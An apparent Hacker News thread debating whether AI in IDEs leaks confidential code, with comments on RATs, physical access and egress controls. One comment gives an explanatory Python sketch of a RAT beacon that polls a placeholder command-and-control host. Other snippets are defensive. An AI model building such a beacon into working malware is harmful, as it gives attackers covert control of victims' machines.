It seems every IDE now has AI built-in. That's a problem if you're working on highly confidential code. You never know when the AI is going to upload code snippets to a remote server for analysis.
Not trying to be mean, but at this point I would expect comments on HN on stories like this to come from people who have actually used AI in IDEs. There is no AI integration that runs automatically on a codebase.
This is HN. 10 years ago that would have been true, but now I expect 99% of commenters to have never used the thing they are talking about, or to have used it once 20 years ago for 10 minutes, or to have not even read the article.
They both support it via plugins. Xcode doesn't enable it by default either; you need to turn it on and sign into an account. It's not really all that different.
What commonly gets installed in those cases is actual malware: a RAT (Remote Admin Tool) that lets the attacker later run commands on your laptop. It's kinda like an OpenSSH server, except it punches a hole through NAT and reports to a command-and-control server that can broadcast commands to the attacker's entire fleet of compromised machines.
If the attacker wants to use AI to help look for valuables on your machine, they won't install AI on your machine; they'll use the remote shell software to pop a shell session and ask an AI running on one of their own machines to poke around the shell for anything sensitive.
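To make the reverse-connection part concrete, the core of it is just an outbound polling loop. Here's a minimal sketch; everything in it is illustrative (c2.example.com is a placeholder, and a real RAT would execute the fetched command and post the output back rather than print it):

```python
# Minimal sketch of a reverse-connection ("phone home") loop.
# The client only ever makes OUTBOUND requests, so NAT and inbound
# firewall rules never see an incoming connection.
import time
import urllib.request

C2_URL = "https://c2.example.com/commands"  # hypothetical placeholder server

while True:
    try:
        # Outbound poll: indistinguishable from ordinary HTTPS traffic
        # as far as the victim's NAT is concerned.
        with urllib.request.urlopen(C2_URL, timeout=10) as resp:
            command = resp.read().decode().strip()
        if command:
            # A real RAT would execute this; every other infected machine
            # polling the same server sees it too, hence "broadcast to the fleet".
            print("server says:", command)
    except OSError:
        pass  # server unreachable; keep polling quietly
    time.sleep(60)
```

This is also why the AI never needs to be on the victim's machine: the attacker drives a shell over this channel and keeps the AI on their end.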
If an attacker has access to your unlocked computer, it is already game over, and LLM tools are quite far down the list of dangerous software they could install.
Maybe we should ban common RAT software first, like `ssh` and `TeamViewer`.
They could install anything, including Claude Code, and then run it in the background as an agent to exfiltrate data. I'm a security professional. This is unacceptable.
I think the parent commenter was pointing out that, instead of installing Claude Code, they could just install actual malware. It's like that phrase Raymond Chen always uses: "you're already on the other side of the airtight hatchway."
Isn't the general advice that if malware has been installed via physical access, the entire machine should be considered permanently compromised? That is to say, if someone has had access to your unlocked machine, I've heard it's way too late for Malwarebytes to be reliable...
This is not a realistic concern. If you're working on highly confidential code (in a serious meaning of that phrase), your whole environment is already either offline or connecting only through a tightly controlled corporate proxy. There are no accidental leaks to AI from those environments.
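For the skeptical: "tightly controlled" typically means deny-by-default egress. A toy sketch of the policy shape (the hostnames are illustrative assumptions; real deployments express this in the proxy's own config, e.g. Squid ACLs, not in Python):

```python
# Deny-by-default egress policy, as a corporate proxy would enforce it.
# Hostnames are illustrative, not a vetted allowlist.
ALLOWED_HOSTS = {
    "pypi.org",
    "github.com",
    "registry.npmjs.org",
}

def egress_allowed(host: str) -> bool:
    """Anything not explicitly allowed is denied, including AI endpoints."""
    return host in ALLOWED_HOSTS

# An IDE's AI plugin simply can't connect from inside such an environment:
assert not egress_allowed("api.openai.com")
assert egress_allowed("github.com")
```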
The right middle ground is running Little Snitch in alert mode. The initial phase of training the filters and manually approving requests is painful, but it's a lot better than an air gap.
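If you want a rough preview of what alert mode will surface before committing to the training phase, you can enumerate which processes currently hold outbound connections. A sketch using the third-party psutil package (this only observes connections after the fact; Little Snitch actually intercepts them before they're made, which is the whole point):

```python
# List local processes with established outbound connections.
# pip install psutil; may need elevated privileges on macOS.
import psutil

for conn in psutil.net_connections(kind="inet"):
    if conn.status != psutil.CONN_ESTABLISHED or not conn.raddr:
        continue
    try:
        name = psutil.Process(conn.pid).name() if conn.pid else "?"
    except (psutil.NoSuchProcess, psutil.AccessDenied):
        continue
    print(f"{name:<24} -> {conn.raddr.ip}:{conn.raddr.port}")
```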
There's a whole range of security concerns, and degrees of "highly confidential".
For most corporate code that is highly confidential, you still have proper internet access, but you sure as hell can't send your code to every AI provider just because you want to, or just because it's built into your IDE.
There is a gulf and many shades between "this code should never be on an internet-connected device" and "it doesn't matter if this code is copied everywhere by absolutely anyone".